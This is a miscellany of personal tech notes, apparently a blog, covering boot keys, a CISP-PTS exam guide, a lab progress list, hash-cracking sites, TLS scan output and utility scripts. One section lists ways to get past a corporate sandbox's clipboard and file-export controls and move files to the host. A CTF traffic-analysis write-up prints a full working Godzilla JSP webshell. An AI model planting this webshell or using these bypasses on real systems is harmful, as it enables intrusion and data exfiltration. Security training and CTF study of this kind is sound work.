Y2026
My energy really has been limited this year
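Manufacturer | Boot key
Acer | F2
Apple | Hold Option (next to the ⌘ key)
ASUS | Del
Dell | F12
Gateway | F1
HP | F9
Intel | F2
Lenovo | F12
Microsoft Surface | Boot from USB: hold the volume-down button; boot to the UEFI menu: hold the volume-up button
Toshiba | F2 or F12
Other | Try Esc, any of F1 - F12, or Enter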
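Taking **rust as an example, set the workspace permissions

Function | Permission
Clipboard copy-in | Fully prohibited
Clipboard copy-out | Fully prohibited
File import | Fully prohibited
File export | Fully prohibited
File sending | Fully prohibited
Printing | Fully prohibited
Screenshot | Fully prohibited
Watermark | Enabled

Bypass-1: sandbox accesses external files
Open the browser and visit

    file:///c:/
    file:///C:/Windows/System32/

C:\Windows\System32\cmd.exe can be downloaded this way.

Bypass-2: sandbox accesses external files

    python -m http.server 80

Visit http://127.0.0.1

Bypass-3: running an exe inside the sandbox
Files named cmd.exe and control.exe can be launched by double-clicking inside the sandbox. It is suggested to generate several exe files and fuzz the file name to find the whitelisted file names.

Bypass-4: running an exe inside the sandbox
Once cmd.exe runs successfully, other programs can usually be run from the terminal; sometimes the full path may be needed.

    999.exe
    M:\Users\Pro\Documents\999.exe

Bypass-5: host accesses the sandbox
Since programs can run inside the sandbox, they can interact with the host over the network via 127.0.0.1.
For example, https://github.com/guyupro/G25WebDAV can be run inside the sandbox, and the host can connect to it with a tool such as WinSCP.

    http://127.0.0.1
    pro
    pro

In the same way, other protocols such as tftp, ftp and ssh can also be used.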
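1. What CISP-PTS is

Certified Information Security Professional - Penetration Testing Specialist (CISP-PTS) is one of the penetration-testing qualifications in the CISP attack-and-defense field. It is aimed at practitioners with strong hands-on ability who want to demonstrate their technical level in a systematic way.

According to the white paper published by the China Information Technology Security Evaluation Center, the CISP-PTE/CISP-PTS track emphasizes the ability to find, analyze and solve problems in real network environments, with CISP-PTS focusing on the assessment of higher-level hands-on skills.

2. Official sources (read these first)

- White paper page: Certified Information Security Professional - Penetration Testing (PTE, PTS) White Paper
- 2022 white paper (PDF): Certified Information Security Professional - Penetration Testing (PTE, PTS) White Paper (2022 edition)
- Application form download and authorized institution entry: China Information Technology Security Evaluation Center - Application form download

3. Key registration points (as laid out in the white paper)

- Training at an authorized training institution is required before registering. According to the white paper, candidates must complete the relevant courses organized by an authorized training institution for the CISP attack-and-defense field before registering.
- No hard threshold for education or work experience. The white paper states that this track sets no hard registration requirement for education or work experience, but the hands-on requirements are high.
- The certificate is valid for 3 years. After it expires, the holder must take the maintenance exam and complete the renewal process as required.

4. Documents to prepare (registration stage)

Following the usual requirements in the white paper, these typically include:

- "Certified Information Security Professional (Attack and Defense Field) Examination and Registration Application Form"
- 3 recent 2-inch color ID photos, bareheaded, blue background
- 1 copy of the ID card

Note: the detailed requirements may be adjusted from year to year; the authorized institution's current notice prevails.

5. Training and exam experience (personal view)

Training

Overall it can be understood as "theory + hands-on drills" advancing in parallel. I suggest first building your own methodology for Web security, system security, database security and middleware security, then refining it repeatedly on ranges and exercises.

Exam

My personal impressions:

- Time management matters more than any single technique;
- Information gathering, path selection and result re-checking directly affect the final score;
- Keeping a steady output matters more than "relying on luck to land a high-severity finding".

The exam duration, question structure and scoring rules may be adjusted between batches; defer to the current official exam instructions.

6. Preparation advice

- Build solid fundamentals first, then go after advanced techniques.
- Do one complete end-to-end drill every week (information gathering -> vulnerability verification -> exploitation and remediation advice).
- Build your own "mistakes and review log", recording where your reasoning went off track rather than only the answers.
- Follow updates to the official white paper and the authorized institutions' notices, so you do not prepare under old rules.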
From https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8

NetSecFocus Trophy Room

Hackthebox

🟡Linux Boxes (NAME STATUS)
BoardLight ✅, Broker ✅, Builder ✅, Busqueda ✅, CozyHosting ✅, Editorial ✅, Help ✅, Intentions ✅, Keeper ✅, LinkVortex ✅, Magic ✅, Monitored ✅, Networked ✅, Pandora ✅, Sau ✅, Soccer ✅, UpDown ✅, Usage ✅

🔵Windows Boxes (NAME STATUS)
Access ✅, Administrator ✅, Aero ✅, Certified ✅, Intelligence ✅, Jeeves ✅, Mailing ✅, Manager ✅, Servmon ✅, StreamIO ✅, Support ✅

🟢Windows Active Directory Boxes (NAME STATUS)
Active ✅, Adagio (HTB Enterprise Box) ⏳, Blackfield ✅, Cascade ✅, Cicada ✅, Escape ✅, Flight ✅, Forest ✅, Monteverde ✅, Return ✅, Sauna ✅, Timelapse ✅

🔴Post OSCP Section. Challenging yourself

🧿ProLabs

Proving Grounds Practice

🟡Linux Boxes (NAME STATUS)
Astronaut ✅, BitForge ⏳, Blackgate ⏳, Boolean ⏳, Clue ⏳, Cockpit ⏳, Codo ✅, Crane ⏳, Exfiltrated ✅, Extplorer ⏳, Fired ⏳, Flu ⏳, Hub ⏳, Image ⏳, Jordak ⏳, Lavita ⏳, law ⏳, Levram ⏳, Ochima ⏳, PC ⏳, Pelican ⏳, Plum ⏳, Press ⏳, PyLoader ⏳, RubyDome ✅, Scrutiny ⏳, SPX ⏳, Twiggy ⏳, Vmdak ⏳, Zipper ⏳

🔵Windows Boxes (NAME STATUS)
Algernon ✅, Authby ⏳, Craft ⏳, DVR4 ⏳, Helpdesk ⏳, Hepet ⏳, Hutch ⏳, Internal ⏳, Jacko ⏳, Kevin ✅, MedJed ⏳, Nickel ⏳, Resourced ⏳, Shenzi ⏳, Slort ⏳, Squid ✅

🟢Windows Active Directory Boxes

🔴Post OSCP Section. Challenging yourself

Proving Grounds Play

🟡Linux Boxes

🔴Post OSCP Section. Challenging yourself

Vulnlab

🟡Linux Boxes

🔵Windows Boxes

🟢Windows Active Directory Boxes

🔴Post OSCP Section. Challenging yourself

Other Labs (NAME STATUS)
GOAD ⏳, VulnAD ⏳, Ludus ⏳, Tj Null Active Directory box ⏳
https://cmd5.com/

https://crackstation.net/
Supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults

https://hashes.com/
Supports: MD5, SHA-1, Vbulletin, Invision Power Board, MyBB, Bcrypt, Wordpress, SHA-256, SHA-512, MYSQL5
    pip install pycryptodome

    from Crypto.Hash import MD4

    def ntlm_hash(password):
        # Encode the password as UTF-16LE
        password_utf16 = password.encode('utf-16le')
        # Create the MD4 hash object
        hash_object = MD4.new()
        # Feed the encoded password into the hash object
        hash_object.update(password_utf16)
        # Get the raw digest
        digest = hash_object.digest()
        # Convert the result to an uppercase hexadecimal string
        return digest.hex().upper()

    # Plaintext password
    plaintext_password = "123456"
    # Compute the NTLM hash
    hash_result = ntlm_hash(plaintext_password)

    print(f"NTLM hash for '{plaintext_password}': {hash_result}")
macOS Sequoia
Updated October 10, 2024
Thanks to https://github.com/Baio1977/NUC8i7HVK-Hackintosh

- Audio (Fix ALL Sound - New Layout 22 for ALC700)
- GPU acceleration
- Intel Wireless / Bluetooth
- Native CPU power management
- SD card reader (Fix 3\12\2023 add CtlnaSDXC.kext + Spoof Device Properties)
- HDMI video and sound
- Thunderbolt JHL6540 Alpine Ridge Work with HotPlug

macOS Ventura
Updated November 2, 2022
Thanks to the guide by a developer abroad: https://osy.gitbook.io/hac-mini-guide/
HarmonyOS 4 supported models
Phones supported by HUAWEI HiCar
HLS was developed by Apple for Apple products, but it is now widely used on many devices.

HTTP Live Streaming
Send live and on‐demand audio and video to iPhone, iPad, Mac, Apple Watch, Apple TV, and PC with HTTP Live Streaming (HLS) technology from Apple. Using the same protocol that powers the web, HLS lets you deploy content using ordinary web servers and content delivery networks. HLS is designed for reliability and dynamically adapts to network conditions by optimizing playback for the available speed of wired and wireless connections.
SSLyze is a fast and powerful SSL/TLS scanning tool and Python library. SSLyze can analyze the SSL/TLS configuration of a server by connecting to it, in order to ensure that it uses strong encryption settings (certificate, cipher suites, elliptic curves, etc.), and that it is not vulnerable to known TLS attacks (Heartbleed, ROBOT, OpenSSL CCS injection, etc.).

Github: https://github.com/nabla-c0d3/sslyze

    # Install
    $ python -m pip install sslyze
    # Usage
    $ python -m sslyze www.baidu.com

    > sslyze.exe www.baidu.com

     CHECKING CONNECTIVITY TO SERVER(S)
     ----------------------------------

       www.baidu.com:443 => 220.181.38.149

     SCAN RESULTS FOR WWW.BAIDU.COM:443 - 220.181.38.149
     ---------------------------------------------------

     * Certificates Information:
         Hostname sent for SNI: www.baidu.com
         Number of certificates detected: 1

       Certificate #0 ( RSAPublicKey )
         SHA1 Fingerprint: 9742d59827d62288cf59c3ff75868dd5d312a0af
         Common Name: baidu.com
         Issuer: GlobalSign RSA OV SSL CA 2018
         Serial Number: 26585094245224241434632730821
         Not Before: 2023-07-06
         Not After: 2024-08-06
         Public Key Algorithm: RSAPublicKey
         Signature Algorithm: sha256
         Key Size: 2048
         Exponent: 65537
         SubjAltName - DNS Names: ['baidu.com', 'baifubao.com', 'www.baidu.cn', 'www.baidu.com.cn', 'mct.y.nuomi.com', 'apollo.auto', 'dwz.cn', '*.baidu.com', '*.baifubao.com', '*.baidustatic.com', '*.bdstatic.com', '*.bdimg.com', '*.hao123.com', '*.nuomi.com', '*.chuanke.com', '*.trustgo.com', '*.bce.baidu.com', '*.eyun.baidu.com', '*.map.baidu.com', '*.mbd.baidu.com', '*.fanyi.baidu.com', '*.baidubce.com', '*.mipcdn.com', '*.news.baidu.com', '*.baidupcs.com', '*.aipage.com', '*.aipage.cn', '*.bcehost.com', '*.safe.baidu.com', '*.im.baidu.com', '*.baiducontent.com', '*.dlnel.com', '*.dlnel.org', '*.dueros.baidu.com', '*.su.baidu.com', '*.91.com', '*.hao123.baidu.com', '*.apollo.auto', '*.xueshu.baidu.com', '*.bj.baidubce.com', '*.gz.baidubce.com', '*.smartapps.cn', '*.bdtjrcv.com', '*.hao222.com', '*.haokan.com', '*.pae.baidu.com', '*.vd.bdstatic.com', '*.cloud.baidu.com', 'click.hm.baidu.com', 'log.hm.baidu.com', 'cm.pos.baidu.com', 'wn.pos.baidu.com', 'update.pan.baidu.com']

       Certificate #0 - Trust
         Android CA Store (14.0.0_r9): OK - Certificate is trusted
         Apple CA Store (iOS 17, iPadOS 17, macOS 14, tvOS 17, and watchOS 10):OK - Certificate is trusted
         Java CA Store (jdk-13.0.2): OK - Certificate is trusted
         Mozilla CA Store (2024-02-04): OK - Certificate is trusted
         Windows CA Store (2023-12-11): OK - Certificate is trusted
         Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
         Received Chain: baidu.com --> GlobalSign RSA OV SSL CA 2018 --> GlobalSign
         Verified Chain: baidu.com --> GlobalSign RSA OV SSL CA 2018 --> GlobalSign
         Received Chain Contains Anchor: OK - Anchor certificate not sent
         Received Chain Order: OK - Order is valid
         Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain

       Certificate #0 - Extensions
         OCSP Must-Staple: NOT SUPPORTED - Extension not found
         Certificate Transparency: OK - 3 SCTs included

       Certificate #0 - OCSP Stapling
         NOT SUPPORTED - Server did not send back an OCSP response

     * SSL 2.0 Cipher Suites:
         Attempted to connect using 7 cipher suites; the server rejected all cipher suites.

     * SSL 3.0 Cipher Suites:
         Attempted to connect using 80 cipher suites.

         The server accepted the following 1 cipher suites:
            TLS_RSA_WITH_RC4_128_SHA 128

         The group of cipher suites supported by the server has the following properties:
           Forward Secrecy INSECURE - Not Supported
           Legacy RC4 Algorithm INSECURE - Supported

     * TLS 1.0 Cipher Suites:
         Attempted to connect using 80 cipher suites.

         The server accepted the following 6 cipher suites:
            TLS_RSA_WITH_RC4_128_SHA 128
            TLS_RSA_WITH_AES_256_CBC_SHA 256
            TLS_RSA_WITH_AES_128_CBC_SHA 128
            TLS_ECDHE_RSA_WITH_RC4_128_SHA 128 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 (256 bits)

         The group of cipher suites supported by the server has the following properties:
           Forward Secrecy OK - Supported
           Legacy RC4 Algorithm INSECURE - Supported

     * TLS 1.1 Cipher Suites:
         Attempted to connect using 80 cipher suites.

         The server accepted the following 6 cipher suites:
            TLS_RSA_WITH_RC4_128_SHA 128
            TLS_RSA_WITH_AES_256_CBC_SHA 256
            TLS_RSA_WITH_AES_128_CBC_SHA 128
            TLS_ECDHE_RSA_WITH_RC4_128_SHA 128 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 (256 bits)

         The group of cipher suites supported by the server has the following properties:
           Forward Secrecy OK - Supported
           Legacy RC4 Algorithm INSECURE - Supported

     * TLS 1.2 Cipher Suites:
         Attempted to connect using 156 cipher suites.

         The server accepted the following 7 cipher suites:
            TLS_RSA_WITH_RC4_128_SHA 128
            TLS_RSA_WITH_AES_256_CBC_SHA 256
            TLS_RSA_WITH_AES_128_CBC_SHA 128
            TLS_ECDHE_RSA_WITH_RC4_128_SHA 128 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 ECDH: prime256v1 (256 bits)
            TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 (256 bits)

         The group of cipher suites supported by the server has the following properties:
           Forward Secrecy OK - Supported
           Legacy RC4 Algorithm INSECURE - Supported

     * TLS 1.3 Cipher Suites:
         Attempted to connect using 5 cipher suites; the server rejected all cipher suites.

     * Deflate Compression:
         OK - Compression disabled

     * OpenSSL CCS Injection:
         OK - Not vulnerable to OpenSSL CCS injection

     * OpenSSL Heartbleed:
         OK - Not vulnerable to Heartbleed

     * ROBOT Attack:
         OK - Not vulnerable.

     * Session Renegotiation:
         Client Renegotiation DoS Attack: OK - Not vulnerable
         Secure Renegotiation: OK - Supported

     * Elliptic Curve Key Exchange:
         Supported curves: prime256v1
         Rejected curves: X25519, X448, prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, secp384r1, secp521r1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1

     SCANS COMPLETED IN 33.189360 S
     ------------------------------

     COMPLIANCE AGAINST MOZILLA TLS CONFIGURATION
     --------------------------------------------

        Checking results against Mozilla's "MozillaTlsConfigurationEnum.INTERMEDIATE" configuration. See https://ssl-config.mozilla.org/ for more details.

        www.baidu.com:443: FAILED - Not compliant.
            * maximum_certificate_lifespan: Certificate life span is 396 days, should be less than 366.
            * tls_versions: TLS versions {'TLSv1.1', 'TLSv1', 'SSLv3'} are supported, but should be rejected.
            * ciphers: Cipher suites {'TLS_RSA_WITH_AES_128_CBC_SHA', 'TLS_RSA_WITH_AES_256_CBC_SHA', 'TLS_ECDHE_RSA_WITH_RC4_128_SHA', 'TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA', 'TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA', 'TLS_RSA_WITH_RC4_128_SHA'} are supported, but should be rejected.

    $ python -m sslyze 1.1.1.1:443
Using RustDesk to remotely control Kali Linux

    sudo apt-get -y install gstreamer1.0-pipewire

Then download and install RustDesk from https://github.com/rustdesk/rustdesk/releases
Save a GBK-encoded file as a UTF-8-encoded file.

    iconv -f GBK -t UTF-8 input.csv > output.csv
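I have recently been planning to tidy up our internal documents. To improve the reading experience, the planned optimizations are as follows:

- Center "Figure X" and "Table X" captions
  - Done by adding <center></center>
- Paragraphs: add to achieve first-line indentation
  - Starting with a Chinese character
  - Starting with an English letter
  - Starting with “ or "
- Replace runs of consecutive blank lines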
Reference: https://pve.proxmox.com/wiki/Qemu-guest-agent

Linux

Debian/Ubuntu

    apt-get install qemu-guest-agent

Redhat

    yum install qemu-guest-agent

Windows

Download the drivers from https://pve.proxmox.com/wiki/Windows_VirtIO_Drivers and install them.
Straight to the code

    #!/usr/bin/python
    from pathlib import Path
    from PIL import Image

    def convert_to_webp(source):
        # Write the WebP file next to the source, with the suffix swapped
        destination = source.with_suffix(".webp")
        # Close the source image once it has been saved
        with Image.open(source) as image:
            image.save(destination, format="webp")
        return destination

    def main():
        # Recursively convert every PNG under the current directory
        paths = Path(".").glob("**/*.png")
        for path in paths:
            webp_path = convert_to_webp(path)
            print(webp_path)

    if __name__ == "__main__":
        main()
HW

Extract HW.zip to get the file hard_web.pcap.

hard_web_1

Question: Which ports does the server have open? Submit the answer in ascending port order, separated by ASCII commas (for example, if the server has ports 80 81 82 83 open, the answer is 80,81,82,83)

    http and http.response.code==200

The server the question refers to should be 192.168.162.188

    tcp.connection.synack and ip.dst==192.168.162.188

Port 80 turns out to have the most requests

    tcp.connection.synack and ip.dst==192.168.162.188 and tcp.port not in {80}

So the ports open on the server should be 80 888 8888

Answer

80,888,8888

hard_web_2

Question: What is the flag value in the root directory of the server?

Godzilla webshell

    <%! String xc="748007e861908c03"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%>

Followed to stream 20052
Mainly CTF write-ups
https://www.writeups.cn/
Continuously updated
Machine A

    docker pull ubuntu:22.04
    docker save ubuntu:22.04 >ubuntu22.04.tar

Machine B

    type ubuntu22.04.tar |docker load
Accelerated downloads within China: https://file.vulnhub.cn/